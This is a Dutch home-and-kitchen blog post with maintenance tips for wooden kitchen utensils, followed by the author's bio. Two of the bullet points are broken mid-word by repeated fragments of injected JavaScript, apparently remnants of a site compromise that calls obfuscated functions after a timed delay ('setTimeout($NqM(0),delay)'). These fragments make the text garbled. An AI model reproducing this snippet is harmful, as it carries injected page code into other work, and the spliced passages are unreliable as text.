Houten Keukengerei? Lees dan deze handige onderhoudtips!

In mijn blog over Dille&Kamille liet ik weten een enorme fan van deze winkel te zijn. Niet alleen de spulletjes vind ik leuk, ook de recepten en praktische tips vind ik enorm handig. Zoals deze tip over het gebruik van houten keukengerei! Wisten jullie dit?

Handige tips voor houten keukengerei!

  • Reinig houten keukengerei zoals snijplanken, pollepels, spatels en speculaasplankjes, etc. niet in de afwasmachine. Ik heb zelf ooit een klein keukenplankje in de afwasmachine gezet en deze was doormidden gebroken… oeps.
  • Het is dus ook niet handig om houten keukengerei te lang in water te laten liggen. Houd je gerei droog en gebruik zo min mogelijk afwasmiddel.
  • Laat het niet bij warmte bronnen liggen of opdrogen. ook dit zorgt er voor dat het kan splijten, kromtreken of breken.
  • Hout neemt geur-, smaak- en kleursdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen op. Het is dus verstandig om aparte snijplanken, lepels en spatels te gebruiken voor zoete en pikante gerechten.
  • Houten keukengerei kun je voor het eerste gebruik inwrijven met (olijf)olie. De olie beschermt het hout tegen vocht en intrekken van geur-, smaak-, en kleursdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen.

Heb jij ook een leuke onderhoudstip? Deel via de facebookpagina of via het contactformulier.

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Houten Keukengerei? Lees dan deze handige onderhoudtips!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.